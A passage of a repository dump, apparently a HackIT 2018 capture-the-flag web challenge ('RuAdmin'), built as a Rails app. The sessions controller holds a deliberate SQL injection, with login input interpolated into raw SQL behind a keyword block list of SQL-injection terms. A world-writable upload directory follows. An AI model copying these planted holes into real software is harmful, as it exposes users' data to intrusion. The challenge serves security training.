| if session[:admin] 19 | @resume = Resume.new 20 | else 21 | redirect_to login_url 22 | end 23 | end 24 | 25 | def create 26 | if session[:admin] 27 | @resume = Resume.new(resume_params) 28 | 29 | if @resume.save 30 | redirect_to resumes_path, notice: "Your resume has been uploaded! :)." 31 | else 32 | render "new" 33 | end 34 | else 35 | redirect_to login_url 36 | end 37 | 38 | end 39 | 40 | def destroy 41 | if session[:admin] 42 | @resume = Resume.find(params[:id]) 43 | @resume.destroy 44 | redirect_to resumes_path, notice: "The resume #{@resume.name} has been deleted." 45 | else 46 | redirect_to login_url 47 | end 48 | end 49 | 50 | private 51 | def resume_params 52 | params.require(:resume).permit(:name, :attachment) 53 | end 54 | 55 | 56 | end 57 | -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/sessions_controller.rb: -------------------------------------------------------------------------------- 1 | class SessionsController < ApplicationController 2 | #protect_from_forgery with: :null_session 3 | def create 4 | if params[:password] != nil and params[:username] != nil 5 | p = params[:password] 6 | u = params[:username] 7 | hack = /union|benchmark|strcmp|locate|STRCMP|position|file|concat|sleep|md5|mid|sub|count|and|left|load|space|instr|pad|conv|right|ascii|cast|reverse|locate|glob|having|like|match|char|regexp|limit|order|group|hex|information/i 8 | if u =~ hack or p =~ hack 9 | flash[:warning] = "hacking detected" 10 | flash[:danger] = "" 11 | render :new 12 | return 13 | end 14 | 15 | user = User.find_by_sql "SELECT * from users where username='#{u}' and password='#{p}' LIMIT 1" 16 | if user.length != 0 17 | session[:user_logged_in] = 1 18 | redirect_to home_url 19 | else 20 | flash[:warning] = "" 21 | flash[:danger] = "username or password is invalid" 22 | render :new 23 | return 24 | end 25 | else 26 | render :new 27 | end 28 | end 29 | 30 | def admin 31 | if params[:password] != nil and params[:username] != nil 32 | p = params[:password] 33 | u = params[:username] 34 | end 35 | 36 | user = User.find_by(username: u, password: p, isadmin:1) 37 | if user 38 | session[:admin] = 1 39 | redirect_to upload_url 40 | return 41 | else 42 | flash[:warning] = "" 43 | flash[:danger] = "username or password is invalid" 44 | render :admin 45 | return 46 | end 47 | 48 | end 49 | 50 | 51 | 52 | def destroy 53 | session.clear 54 | redirect_to login_url 55 | end 56 | end 57 | -------------------------------------------------------------------------------- /web/RuAdmin/app/helpers/application_helper.rb: -------------------------------------------------------------------------------- 1 | module ApplicationHelper 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/helpers/resumes_helper.rb: -------------------------------------------------------------------------------- 1 | module ResumesHelper 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/helpers/sessions_helper.rb: -------------------------------------------------------------------------------- 1 | module SessionsHelper 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/helpers/users_helper.rb: -------------------------------------------------------------------------------- 1 | module UsersHelper 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/jobs/application_job.rb: -------------------------------------------------------------------------------- 1 | class ApplicationJob < ActiveJob::Base 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/mailers/application_mailer.rb: -------------------------------------------------------------------------------- 1 | class ApplicationMailer < ActionMailer::Base 2 | default from: 'from@example.com' 3 | layout 'mailer' 4 | end 5 | -------------------------------------------------------------------------------- /web/RuAdmin/app/models/application_record.rb: -------------------------------------------------------------------------------- 1 | class ApplicationRecord < ActiveRecord::Base 2 | self.abstract_class = true 3 | end 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/models/concerns/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/app/models/concerns/.keep -------------------------------------------------------------------------------- /web/RuAdmin/app/models/resume.rb: -------------------------------------------------------------------------------- 1 | class Resume < ApplicationRecord 2 | mount_uploader :attachment, AttachmentUploader # Tells rails to use this uploader for this model. 3 | validate :resume_size_validation, :if => "resume?" # Make sure the owner's name is present. 4 | def resume_size_validation 5 | errors[:resume] << "should be less than 5MB" if resume.size > 2.megabytes 6 | end 7 | end 8 | -------------------------------------------------------------------------------- /web/RuAdmin/app/models/user.rb: -------------------------------------------------------------------------------- 1 | class User < ApplicationRecord 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/uploaders/attachment_uploader.rb: -------------------------------------------------------------------------------- 1 | 2 | 3 | class AttachmentUploader < CarrierWave::Uploader::Base 4 | require 'securerandom' 5 | require 'fileutils' 6 | # Include RMagick or MiniMagick support: 7 | # include CarrierWave::RMagick 8 | # include CarrierWave::MiniMagick 9 | 10 | # Choose what kind of storage to use for this uploader: 11 | storage :file 12 | # storage :fog 13 | 14 | # Override the directory where uploaded files will be stored. 15 | # This is a sensible default for uploaders that are meant to be mounted: 16 | 17 | def store_dir 18 | #uuid = SecureRandom.uuid 19 | require 'digest' 20 | remoteip = Digest::SHA256.hexdigest $request.remote_ip + $request.remote_ip 21 | FileUtils::mkdir_p "uploads/resumes/#{remoteip}/" 22 | FileUtils::chmod 0777, "uploads/resumes/#{remoteip}" 23 | "../uploads/resumes/#{remoteip}" 24 | end 25 | 26 | # Provide a default URL as a default if there hasn't been a file uploaded: 27 | # def default_url(*args) 28 | # # For Rails 3.1+ asset pipeline compatibility: 29 | # # ActionController::Base.helpers.asset_path("fallback/" + [version_name, "default.png"].compact.join('_')) 30 | # 31 | # "/images/fallback/" + [version_name, "default.png"].compact.join('_') 32 | # end 33 | 34 | # Process files as they are uploaded: 35 | # process scale: [200, 300] 36 | # 37 | # def scale(width, height) 38 | # # do something 39 | # end 40 | 41 | # Create different versions of your uploaded files: 42 | # version :thumb do 43 | # process resize_to_fit: [50, 50] 44 | # end 45 | 46 | # Add a white list of extensions which are allowed to be uploaded. 47 | # For images you might use something like this: 48 | # def extension_whitelist 49 | # %w(jpg jpeg gif png) 50 | # end 51 | 52 | # Override the filename of the uploaded files: 53 | # Avoid using model.id or version_name here, see uploader/store.rb for details. 54 | # def filename 55 | # "something.jpg" if original_filename 56 | # end 57 | end 58 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/home/index.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | logout 5 |
6 |

Hello, Regular User!

7 |

As you can see your privilege is pretty useless

8 |
9 |

If you want some 1337 features, maybe get admin privilege.

10 | Try it 11 |
12 | 13 | 14 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/layouts/application.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Testapp 5 | <%= csrf_meta_tags %> 6 | 7 | <%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %> 8 | <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %> 9 | 10 | <% if flash[:error].present? %> 11 |

<%= flash[:error] %>

12 | <% end %> 13 | <% if flash[:notice].present? %> 14 |

<%= flash[:notice] %>

15 | <% end %> 16 | 17 | <%= yield %> 18 | 19 | 20 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/layouts/mailer.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 8 | 9 | 10 | 11 | <%= yield %> 12 | 13 | 14 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/layouts/mailer.text.erb: -------------------------------------------------------------------------------- 1 | <%= yield %> 2 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/resumes/create.html.erb: -------------------------------------------------------------------------------- 1 |

Resumes#create

2 |

Find me in app/views/resumes/create.html.erb

3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/resumes/destroy.html.erb: -------------------------------------------------------------------------------- 1 |

Resumes#destroy

2 |

Find me in app/views/resumes/destroy.html.erb

3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/resumes/index.html.erb: -------------------------------------------------------------------------------- 1 | <% if !flash[:notice].blank? %> 2 |
3 | <%= flash[:notice] %> 4 |
5 | <% end %> 6 | 7 |
8 | 9 | <%= link_to "New Resume", new_resume_path, class: "btn btn-primary" %> 10 | <%= link_to "logout", logout_path, class: "btn btn-primary" %> 11 |
12 |
13 | 14 | 15 | . 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | <% @resumes.each_with_index do |path,idx| %> 25 | 26 | 27 | 28 | 29 | 30 | 31 | <% end %> 32 | 33 | 34 |
IndexFull Path
<%= idx %><%= path %>
35 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/resumes/new.html.erb: -------------------------------------------------------------------------------- 1 | <% if !@resume.errors.empty? %> 2 |
3 | 4 | 9 | 10 |
11 | <% end %> 12 | 13 |
14 | <%= form_for @resume, html: { multipart: true } do |f| %> 15 | <%= f.label :name %> 16 | <%= f.text_field :name %> 17 | <%= f.label :attachment %> 18 | <%= f.file_field :attachment, onchange: "validateFiles(this);", 19 | data: { max_file_size: 5.megabytes } %> 20 | <%= f.submit "Save", class: "btn btn-primary" %> 21 | <% end %> 22 |
23 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/sessions/admin.html.erb: -------------------------------------------------------------------------------- 1 |
2 | Admin Login 3 |
4 | 5 |
6 |
7 |
8 | <%= form_tag admin_path do %> 9 |
10 | <%= label_tag :username %>
11 | <%= text_field_tag :username, params[:username] %> 12 |
13 |
14 | <%= label_tag :password %>
15 | <%= password_field_tag :password %> 16 |
17 |
<%= submit_tag "Log In" %>
19 |
20 | <% flash.each do |key, value| %> 21 |
<%= value %>
22 | <% end %> 23 | <% end %> 24 | 25 |
26 |
27 | 28 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/sessions/new.html.erb: -------------------------------------------------------------------------------- 1 |
2 | User Login 3 |
4 | 5 |
6 |
7 |
8 | <%= form_tag sessions_path do %> 9 |
10 | <%= label_tag :username %>
11 | <%= text_field_tag :username, params[:username] %> 12 |
13 |
14 | <%= label_tag :password %>
15 | <%= password_field_tag :password %> 16 |
17 |
<%= submit_tag "Log In" %>
19 |
20 | <% flash.each do |key, value| %> 21 |
<%= value %>
22 | <% end %> 23 | <% end %> 24 | 25 |
26 |
27 | 28 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/bundle: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../../Gemfile', __FILE__) 3 | load Gem.bin_path('bundler', 'bundle') 4 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/rails: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | begin 3 | load File.expand_path('../spring', __FILE__) 4 | rescue LoadError => e 5 | raise unless e.message.include?('spring') 6 | end 7 | APP_PATH = File.expand_path('../config/application', __dir__) 8 | require_relative '../config/boot' 9 | require 'rails/commands' 10 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/rake: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | begin 3 | load File.expand_path('../spring', __FILE__) 4 | rescue LoadError => e 5 | raise unless e.message.include?('spring') 6 | end 7 | require_relative '../config/boot' 8 | require 'rake' 9 | Rake.application.run 10 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/setup: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'pathname' 3 | require 'fileutils' 4 | include FileUtils 5 | 6 | # path to your application root. 7 | APP_ROOT = Pathname.new File.expand_path('../../', __FILE__) 8 | 9 | def system!(*args) 10 | system(*args) || abort("\n== Command #{args} failed ==") 11 | end 12 | 13 | chdir APP_ROOT do 14 | # This script is a starting point to setup your application. 15 | # Add necessary setup steps to this file. 16 | 17 | puts '== Installing dependencies ==' 18 | system! 'gem install bundler --conservative' 19 | system('bundle check') || system!('bundle install') 20 | 21 | # puts "\n== Copying sample files ==" 22 | # unless File.exist?('config/database.yml') 23 | # cp 'config/database.yml.sample', 'config/database.yml' 24 | # end 25 | 26 | puts "\n== Preparing database ==" 27 | system! 'bin/rails db:setup' 28 | 29 | puts "\n== Removing old logs and tempfiles ==" 30 | system! 'bin/rails log:clear tmp:clear' 31 | 32 | puts "\n== Restarting application server ==" 33 | system! 'bin/rails restart' 34 | end 35 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/spring: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # This file loads spring without using Bundler, in order to be fast. 4 | # It gets overwritten when you run the `spring binstub` command. 5 | 6 | unless defined?(Spring) 7 | require 'rubygems' 8 | require 'bundler' 9 | 10 | lockfile = Bundler::LockfileParser.new(Bundler.default_lockfile.read) 11 | spring = lockfile.specs.detect { |spec| spec.name == "spring" } 12 | if spring 13 | Gem.use_paths Gem.dir, Bundler.bundle_path.to_s, *Gem.path 14 | gem 'spring', spring.version 15 | require 'spring/binstub' 16 | end 17 | end 18 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/update: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'pathname' 3 | require 'fileutils' 4 | include FileUtils 5 | 6 | # path to your application root. 7 | APP_ROOT = Pathname.new File.expand_path('../../', __FILE__) 8 | 9 | def system!(*args) 10 | system(*args) || abort("\n== Command #{args} failed ==") 11 | end 12 | 13 | chdir APP_ROOT do 14 | # This script is a way to update your development environment automatically. 15 | # Add necessary update steps to this file. 16 | 17 | puts '== Installing dependencies ==' 18 | system! 'gem install bundler --conservative' 19 | system('bundle check') || system!('bundle install') 20 | 21 | puts "\n== Updating database ==" 22 | system! 'bin/rails db:migrate' 23 | 24 | puts "\n== Removing old logs and tempfiles ==" 25 | system! 'bin/rails log:clear tmp:clear' 26 | 27 | puts "\n== Restarting application server ==" 28 | system! 'bin/rails restart' 29 | end 30 | -------------------------------------------------------------------------------- /web/RuAdmin/config.ru: -------------------------------------------------------------------------------- 1 | # This file is used by Rack-based servers to start the application. 2 | 3 | require_relative 'config/environment' 4 | 5 | run Rails.application 6 | -------------------------------------------------------------------------------- /web/RuAdmin/config/application.rb: -------------------------------------------------------------------------------- 1 | require_relative 'boot' 2 | 3 | require 'rails/all' 4 | 5 | # Require the gems listed in Gemfile, including any gems 6 | # you've limited to :test, :development, or :production. 7 | Bundler.require(*Rails.groups) 8 | 9 | module Testapp 10 | class Application < Rails::Application 11 | # Settings in config/environments/* take precedence over those specified here. 12 | # Application configuration should go into files in config/initializers 13 | # -- all .rb files in that directory are automatically loaded. 14 | end 15 | end 16 | -------------------------------------------------------------------------------- /web/RuAdmin/config/boot.rb: -------------------------------------------------------------------------------- 1 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__) 2 | 3 | require 'bundler/setup' # Set up gems listed in the Gemfile. 4 | -------------------------------------------------------------------------------- /web/RuAdmin/config/cable.yml: -------------------------------------------------------------------------------- 1 | development: 2 | adapter: async 3 | 4 | test: 5 | adapter: async 6 | 7 | production: 8 | adapter: redis 9 | url: redis://localhost:6379/1 10 | -------------------------------------------------------------------------------- /web/RuAdmin/config/database.yml: -------------------------------------------------------------------------------- 1 | # MySQL. Versions 5.0 and up are supported. 2 | # 3 | # Install the MySQL driver 4 | # gem install mysql2 5 | # 6 | # Ensure the MySQL gem is defined in your Gemfile 7 | # gem 'mysql2' 8 | # 9 | # And be sure to use new-style password hashing: 10 | # http://dev.mysql.com/doc/refman/5.7/en/old-client.html 11 | # 12 | default: &default 13 | adapter: mysql2 14 | encoding: utf8 15 | pool: 5 16 | username: #### 17 | password: #### 18 | socket: /var/run/mysqld/mysqld.sock 19 | 20 | development: 21 | <<: *default 22 | database: ####_development 23 | 24 | # Warning: The database defined as "test" will be erased and 25 | # re-generated from your development database when you run "rake". 26 | # Do not set this db to the same as development or production. 27 | test: 28 | <<: *default 29 | database: ###_test 30 | 31 | # As with config/secrets.yml, you never want to store sensitive information, 32 | # like your database password, in your source code. If your source code is 33 | # ever seen by anyone, they now have access to your database. 34 | # 35 | # Instead, provide the password as a unix environment variable when you boot 36 | # the app. Read http://guides.rubyonrails.org/configuring.html#configuring-a-database 37 | # for a full rundown on how to provide these environment variables in a 38 | # production deployment. 39 | # 40 | # On Heroku and other platform providers, you may have a full connection URL 41 | # available as an environment variable. For example: 42 | # 43 | # DATABASE_URL="mysql2://myuser:mypass@localhost/somedatabase" 44 | # 45 | # You can use this database configuration with: 46 | # 47 | # production: 48 | # url: <%= ENV['DATABASE_URL'] %> 49 | # 50 | production: 51 | <<: *default 52 | database: ###_development 53 | username: ### 54 | password: 55 | -------------------------------------------------------------------------------- /web/RuAdmin/config/environment.rb: -------------------------------------------------------------------------------- 1 | # Load the Rails application. 2 | require_relative 'application' 3 | 4 | # Initialize the Rails application. 5 | Rails.application.initialize! 6 | -------------------------------------------------------------------------------- /web/RuAdmin/config/environments/development.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # In the development environment your application's code is reloaded on 5 | # every request. This slows down response time but is perfect for development 6 | # since you don't have to restart the web server when you make code changes. 7 | config.cache_classes = false 8 | 9 | # Do not eager load code on boot. 10 | config.eager_load = false 11 | 12 | # Show full error reports. 13 | config.consider_all_requests_local = true 14 | 15 | # Enable/disable caching. By default caching is disabled. 16 | if Rails.root.join('tmp/caching-dev.txt').exist? 17 | config.action_controller.perform_caching = true 18 | 19 | config.cache_store = :memory_store 20 | config.public_file_server.headers = { 21 | 'Cache-Control' => 'public, max-age=172800' 22 | } 23 | else 24 | config.action_controller.perform_caching = false 25 | 26 | config.cache_store = :null_store 27 | end 28 | 29 | # Don't care if the mailer can't send. 30 | config.action_mailer.raise_delivery_errors = false 31 | 32 | config.action_mailer.perform_caching = false 33 | 34 | # Print deprecation notices to the Rails logger. 35 | config.active_support.deprecation = :log 36 | 37 | # Raise an error on page load if there are pending migrations. 38 | config.active_record.migration_error = :page_load 39 | 40 | # Debug mode disables concatenation and preprocessing of assets. 41 | # This option may cause significant delays in view rendering with a large 42 | # number of complex assets. 43 | config.assets.debug = true 44 | 45 | # Suppress logger output for asset requests. 46 | config.assets.quiet = true 47 | 48 | # Raises error for missing translations 49 | # config.action_view.raise_on_missing_translations = true 50 | 51 | # Use an evented file watcher to asynchronously detect changes in source code, 52 | # routes, locales, etc. This feature depends on the listen gem. 53 | config.file_watcher = ActiveSupport::EventedFileUpdateChecker 54 | end 55 | -------------------------------------------------------------------------------- /web/RuAdmin/config/environments/production.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # Code is not reloaded between requests. 5 | config.cache_classes = true 6 | 7 | # Eager load code on boot. This eager loads most of Rails and 8 | # your application in memory, allowing both threaded web servers 9 | # and those relying on copy on write to perform better. 10 | # Rake tasks automatically ignore this option for performance. 11 | config.eager_load = true 12 | 13 | # Full error reports are disabled and caching is turned on. 14 | config.consider_all_requests_local = false 15 | config.action_controller.perform_caching = true 16 | 17 | # Disable serving static files from the `/public` folder by default since 18 | # Apache or NGINX already handles this. 19 | config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present? 20 | 21 | # Compress JavaScripts and CSS. 22 | config.assets.js_compressor = :uglifier 23 | # config.assets.css_compressor = :sass 24 | 25 | # Do not fallback to assets pipeline if a precompiled asset is missed. 26 | config.assets.compile = true 27 | 28 | # `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb 29 | 30 | # Enable serving of images, stylesheets, and JavaScripts from an asset server. 31 | # config.action_controller.asset_host = 'http://assets.example.com' 32 | 33 | # Specifies the header that your server uses for sending files. 34 | # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache 35 | # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX 36 | 37 | # Mount Action Cable outside main process or domain 38 | # config.action_cable.mount_path = nil 39 | # config.action_cable.url = 'wss://example.com/cable' 40 | # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ] 41 | 42 | # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies. 43 | # config.force_ssl = true 44 | 45 | # Use the lowest log level to ensure availability of diagnostic information 46 | # when problems arise. 47 | config.log_level = :debug 48 | 49 | # Prepend all log lines with the following tags. 50 | config.log_tags = [ :request_id ] 51 | 52 | # Use a different cache store in production. 53 | # config.cache_store = :mem_cache_store 54 | 55 | # Use a real queuing backend for Active Job (and separate queues per environment) 56 | # config.active_job.queue_adapter = :resque 57 | # config.active_job.queue_name_prefix = "testapp_#{Rails.env}" 58 | config.action_mailer.perform_caching = false 59 | 60 | # Ignore bad email addresses and do not raise email delivery errors. 61 | # Set this to true and configure the email server for immediate delivery to raise delivery errors. 62 | # config.action_mailer.raise_delivery_errors = false 63 | 64 | # Enable locale fallbacks for I18n (makes lookups for any locale fall back to 65 | # the I18n.default_locale when a translation cannot be found). 66 | config.i18n.fallbacks = true 67 | 68 | # Send deprecation notices to registered listeners. 69 | config.active_support.deprecation = :notify 70 | 71 | # Use default logging formatter so that PID and timestamp are not suppressed. 72 | config.log_formatter = ::Logger::Formatter.new 73 | 74 | # Use a different logger for distributed setups. 75 | # require 'syslog/logger' 76 | # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name') 77 | 78 | if ENV["RAILS_LOG_TO_STDOUT"].present? 79 | logger = ActiveSupport::Logger.new(STDOUT) 80 | logger.formatter = config.log_formatter 81 | config.logger = ActiveSupport::TaggedLogging.new(logger) 82 | end 83 | 84 | # Do not dump schema after migrations. 85 | config.active_record.dump_schema_after_migration = false 86 | end 87 | -------------------------------------------------------------------------------- /web/RuAdmin/config/environments/test.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # The test environment is used exclusively to run your application's 5 | # test suite. You never need to work with it otherwise. Remember that 6 | # your test database is "scratch space" for the test suite and is wiped 7 | # and recreated between test runs. Don't rely on the data there! 8 | config.cache_classes = true 9 | 10 | # Do not eager load code on boot. This avoids loading your whole application 11 | # just for the purpose of running a single test. If you are using a tool that 12 | # preloads Rails for running tests, you may have to set it to true. 13 | config.eager_load = false 14 | 15 | # Configure public file server for tests with Cache-Control for performance. 16 | config.public_file_server.enabled = true 17 | config.public_file_server.headers = { 18 | 'Cache-Control' => 'public, max-age=3600' 19 | } 20 | 21 | # Show full error reports and disable caching. 22 | config.consider_all_requests_local = true 23 | config.action_controller.perform_caching = false 24 | 25 | # Raise exceptions instead of rendering exception templates. 26 | config.action_dispatch.show_exceptions = false 27 | 28 | # Disable request forgery protection in test environment. 29 | config.action_controller.allow_forgery_protection = false 30 | config.action_mailer.perform_caching = false 31 | 32 | # Tell Action Mailer not to deliver emails to the real world. 33 | # The :test delivery method accumulates sent emails in the 34 | # ActionMailer::Base.deliveries array. 35 | config.action_mailer.delivery_method = :test 36 | 37 | # Print deprecation notices to the stderr. 38 | config.active_support.deprecation = :stderr 39 | 40 | # Raises error for missing translations 41 | # config.action_view.raise_on_missing_translations = true 42 | end 43 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/application_controller_renderer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # ActiveSupport::Reloader.to_prepare do 4 | # ApplicationController.renderer.defaults.merge!( 5 | # http_host: 'example.org', 6 | # https: false 7 | # ) 8 | # end 9 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/assets.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Version of your assets, change this if you want to expire all your assets. 4 | Rails.application.config.assets.version = '1.0' 5 | 6 | # Add additional assets to the asset load path 7 | # Rails.application.config.assets.paths << Emoji.images_path 8 | 9 | # Precompile additional assets. 10 | # application.js, application.css, and all non-JS/CSS in app/assets folder are already added. 11 | # Rails.application.config.assets.precompile += %w( search.js ) 12 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/backtrace_silencers.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # You can add backtrace silencers for libraries that you're using but don't wish to see in your backtraces. 4 | # Rails.backtrace_cleaner.add_silencer { |line| line =~ /my_noisy_library/ } 5 | 6 | # You can also remove all the silencers if you're trying to debug a problem that might stem from framework code. 7 | # Rails.backtrace_cleaner.remove_silencers! 8 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/cookies_serializer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Specify a serializer for the signed and encrypted cookie jars. 4 | # Valid options are :json, :marshal, and :hybrid. 5 | Rails.application.config.action_dispatch.cookies_serializer = :json 6 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/filter_parameter_logging.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Configure sensitive parameters which will be filtered from the log file. 4 | Rails.application.config.filter_parameters += [:password] 5 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/inflections.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Add new inflection rules using the following format. Inflections 4 | # are locale specific, and you may define rules for as many different 5 | # locales as you wish. All of these examples are active by default: 6 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 7 | # inflect.plural /^(ox)$/i, '\1en' 8 | # inflect.singular /^(ox)en/i, '\1' 9 | # inflect.irregular 'person', 'people' 10 | # inflect.uncountable %w( fish sheep ) 11 | # end 12 | 13 | # These inflection rules are supported but not enabled by default: 14 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 15 | # inflect.acronym 'RESTful' 16 | # end 17 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/mime_types.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Add new mime types for use in respond_to blocks: 4 | # Mime::Type.register "text/richtext", :rtf 5 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/new_framework_defaults.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | # 3 | # This file contains migration options to ease your Rails 5.0 upgrade. 4 | # 5 | # Read the Guide for Upgrading Ruby on Rails for more info on each option. 6 | 7 | Rails.application.config.action_controller.raise_on_unfiltered_parameters = true 8 | 9 | # Enable per-form CSRF tokens. Previous versions had false. 10 | Rails.application.config.action_controller.per_form_csrf_tokens = true 11 | 12 | # Enable origin-checking CSRF mitigation. Previous versions had false. 13 | Rails.application.config.action_controller.forgery_protection_origin_check = true 14 | 15 | # Make Ruby 2.4 preserve the timezone of the receiver when calling `to_time`. 16 | # Previous versions had false. 17 | ActiveSupport.to_time_preserves_timezone = true 18 | 19 | # Require `belongs_to` associations by default. Previous versions had false. 20 | Rails.application.config.active_record.belongs_to_required_by_default = true 21 | 22 | # Do not halt callback chains when a callback returns false. Previous versions had true. 23 | ActiveSupport.halt_callback_chains_on_return_false = false 24 | 25 | # Configure SSL options to enable HSTS with subdomains. Previous versions had false. 26 | Rails.application.config.ssl_options = { hsts: { subdomains: true } } 27 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/session_store.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | Rails.application.config.session_store :cookie_store, key: '_testapp_session' 4 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/wrap_parameters.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # This file contains settings for ActionController::ParamsWrapper which 4 | # is enabled by default. 5 | 6 | # Enable parameter wrapping for JSON. You can disable this by setting :format to an empty array. 7 | ActiveSupport.on_load(:action_controller) do 8 | wrap_parameters format: [:json] 9 | end 10 | 11 | # To enable root element in JSON for ActiveRecord objects. 12 | # ActiveSupport.on_load(:active_record) do 13 | # self.include_root_in_json = true 14 | # end 15 | -------------------------------------------------------------------------------- /web/RuAdmin/config/locales/en.yml: -------------------------------------------------------------------------------- 1 | # Files in the config/locales directory are used for internationalization 2 | # and are automatically loaded by Rails. If you want to use locales other 3 | # than English, add the necessary files in this directory. 4 | # 5 | # To use the locales, use `I18n.t`: 6 | # 7 | # I18n.t 'hello' 8 | # 9 | # In views, this is aliased to just `t`: 10 | # 11 | # <%= t('hello') %> 12 | # 13 | # To use a different locale, set it with `I18n.locale`: 14 | # 15 | # I18n.locale = :es 16 | # 17 | # This would use the information in config/locales/es.yml. 18 | # 19 | # To learn more, please read the Rails Internationalization guide 20 | # available at http://guides.rubyonrails.org/i18n.html. 21 | 22 | en: 23 | hello: "Hello world" 24 | -------------------------------------------------------------------------------- /web/RuAdmin/config/puma.rb: -------------------------------------------------------------------------------- 1 | # Puma can serve each request in a thread from an internal thread pool. 2 | # The `threads` method setting takes two numbers a minimum and maximum. 3 | # Any libraries that use thread pools should be configured to match 4 | # the maximum value specified for Puma. Default is set to 5 threads for minimum 5 | # and maximum, this matches the default thread size of Active Record. 6 | # 7 | threads_count = ENV.fetch("RAILS_MAX_THREADS") { 5 }.to_i 8 | threads threads_count, threads_count 9 | 10 | # Specifies the `port` that Puma will listen on to receive requests, default is 3000. 11 | # 12 | port ENV.fetch("PORT") { 3000 } 13 | 14 | # Specifies the `environment` that Puma will run in. 15 | # 16 | environment ENV.fetch("RAILS_ENV") { "development" } 17 | 18 | # Specifies the number of `workers` to boot in clustered mode. 19 | # Workers are forked webserver processes. If using threads and workers together 20 | # the concurrency of the application would be max `threads` * `workers`. 21 | # Workers do not work on JRuby or Windows (both of which do not support 22 | # processes). 23 | # 24 | # workers ENV.fetch("WEB_CONCURRENCY") { 2 } 25 | 26 | # Use the `preload_app!` method when specifying a `workers` number. 27 | # This directive tells Puma to first boot the application and load code 28 | # before forking the application. This takes advantage of Copy On Write 29 | # process behavior so workers use less memory. If you use this option 30 | # you need to make sure to reconnect any threads in the `on_worker_boot` 31 | # block. 32 | # 33 | # preload_app! 34 | 35 | # The code in the `on_worker_boot` will be called 